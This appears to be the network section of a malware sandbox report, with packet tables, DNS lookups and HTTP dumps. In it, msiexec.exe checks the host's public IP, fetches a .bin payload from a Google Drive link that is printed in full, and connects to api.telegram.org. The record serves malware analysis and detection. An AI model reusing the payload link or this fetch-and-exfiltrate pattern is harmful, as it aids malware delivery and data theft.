                                                                                                                                                                                  Dec 16, 2024 18:29:17.769731998 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:17.769752026 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:17.816356897 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:18.986018896 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:18.988019943 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:18.988111973 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.459614038 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.459707022 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.459943056 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:19.460345030 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:19.488951921 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:19.609277010 CET8049797158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.609510899 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:19.629319906 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:19.629420042 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:19.629617929 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:19.629955053 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:19.629975080 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.010432005 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.010642052 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:21.012823105 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:21.012852907 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.013076067 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.014354944 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:21.059334993 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.514730930 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.514905930 CET44349806149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:21.514977932 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:21.518995047 CET49806443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:27.617630005 CET4974280192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:27.864825010 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:27.864883900 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:27.865098953 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:27.865300894 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:27.865314960 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.230302095 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.232424974 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:29.232542038 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.232673883 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:29.232686043 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.989142895 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.989244938 CET44349825149.154.167.220192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:29.989326000 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:29.989803076 CET49825443192.168.2.4149.154.167.220
                                                                                                                                                                                  Dec 16, 2024 18:29:31.519962072 CET49833443192.168.2.4149.154.167.220
Dec 16, 2024 18:29:31.520006895 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4
Dec 16, 2024 18:29:31.520112991 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220
Dec 16, 2024 18:29:31.520977020 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220
Dec 16, 2024 18:29:31.520992994 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4
Dec 16, 2024 18:29:32.883877993 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4
Dec 16, 2024 18:29:32.885648012 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220
Dec 16, 2024 18:29:32.885694981 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4
Dec 16, 2024 18:29:32.885715961 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220
Dec 16, 2024 18:29:32.885730982 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4
Dec 16, 2024 18:29:33.543570042 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4
Dec 16, 2024 18:29:33.543788910 CET | 443 | 49833 | 149.154.167.220 | 192.168.2.4
Dec 16, 2024 18:29:33.543864012 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220
Dec 16, 2024 18:29:33.544275999 CET | 49833 | 443 | 192.168.2.4 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 18:28:41.953442097 CET | 57921 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 18:28:42.092575073 CET | 53 | 57921 | 1.1.1.1 | 192.168.2.4
Dec 16, 2024 18:28:44.740622044 CET | 55485 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 18:28:44.878988028 CET | 53 | 55485 | 1.1.1.1 | 192.168.2.4
Dec 16, 2024 18:28:50.456899881 CET | 61127 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 18:28:50.595096111 CET | 53 | 61127 | 1.1.1.1 | 192.168.2.4
Dec 16, 2024 18:28:52.709714890 CET | 63341 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 18:28:53.164560080 CET | 53 | 63341 | 1.1.1.1 | 192.168.2.4
Dec 16, 2024 18:29:19.489572048 CET | 60090 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 18:29:19.628176928 CET | 53 | 60090 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 18:28:41.953442097 CET | 192.168.2.4 | 1.1.1.1 | 0xb53b | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:44.740622044 CET | 192.168.2.4 | 1.1.1.1 | 0xc8c7 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:50.456899881 CET | 192.168.2.4 | 1.1.1.1 | 0x2144 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:52.709714890 CET | 192.168.2.4 | 1.1.1.1 | 0x1dfe | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:29:19.489572048 CET | 192.168.2.4 | 1.1.1.1 | 0x8ede | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 18:28:42.092575073 CET | 1.1.1.1 | 192.168.2.4 | 0xb53b | No error (0) | drive.google.com | | 172.217.19.174 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:44.878988028 CET | 1.1.1.1 | 192.168.2.4 | 0xc8c7 | No error (0) | drive.usercontent.google.com | | 142.250.181.1 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:50.595096111 CET | 1.1.1.1 | 192.168.2.4 | 0x2144 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:53.164560080 CET | 1.1.1.1 | 192.168.2.4 | 0x1dfe | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:28:53.164560080 CET | 1.1.1.1 | 192.168.2.4 | 0x1dfe | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:29:19.628176928 CET | 1.1.1.1 | 192.168.2.4 | 0x8ede | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 18:28:50.720628977 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 18:28:51.925323009 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:28:51 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: cc9b5aa26542e857f18015b15ec6230e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 18:28:51.928620100 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 16, 2024 18:28:52.303622007 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:28:52 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4b22209860fad5356dbde44903818b55
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 18:28:54.864197969 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 16, 2024 18:28:55.238343954 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:28:55 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 56d354e82e60dd8c62bfe7d3321a28f9
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 18:28:57.093662024 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 16, 2024 18:28:58.322419882 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:28:58 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1cba1f53a282cc88736ca02de597e129
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49750 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 18:29:00.176654100 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 18:29:02.105992079 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:29:01 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b4c5aec3fd19d62f4733b5a0ccf429c3
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49761 | 158.101.44.242 | 80 | 8012 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 18:29:03.937235117 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 18:29:05.424324989 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:29:05 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1b9c47a9265c91e2b79d2abd8b30d147
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49768 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 18:29:07.228050947 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 16, 2024 18:29:08.436230898 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 17:29:08 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 3cce21803a6e7d35298182001f494616
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49779 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 18:29:10.267282963 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 16, 2024 18:29:11.475013018 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 17:29:11 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: e8649791bb454324932d1de5d96bb7d0
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49787 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 18:29:13.298779011 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 16, 2024 18:29:14.506438017 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 17:29:14 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 1f8d9ffab43cf7e3bdd34f2233855ddf
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49797 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 18:29:16.551518917 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 16, 2024 18:29:17.767580986 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 17:29:17 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 73686b10e28dd1355924ee9bded3b4b3
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49736 | Destination IP: 172.217.19.174 | Destination Port: 443 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 17:28:43 UTC | 216 | OUT | GET /uc?export=download&id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
2024-12-16 17:28:44 UTC | 1920 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 16 Dec 2024 17:28:44 GMT
    Location: https://drive.usercontent.google.com/download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: script-src 'nonce-u1j_x99rFhBLMGdLvlXsaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 142.250.181.1 | Destination Port: 443 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 17:28:46 UTC | 258 | OUT | GET /download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
2024-12-16 17:28:49 UTC | 4947 | IN | HTTP/1.1 200 OK
    X-GUploader-UploadID: AFiumC44EnyHzDLYPW86pnQVTedAjxrEDpZaaHbRbZR9SbeoI4v9aRQP5NLDkQy7yoO03mKf
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="digvjxGcgtYbtmKcYQiubAI104.bin"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 277056
    Last-Modified: Mon, 16 Dec 2024 09:14:07 GMT
    Date: Mon, 16 Dec 2024 17:28:49 GMT
    Expires: Mon, 16 Dec 2024 17:28:49 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=/T2+IA==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close
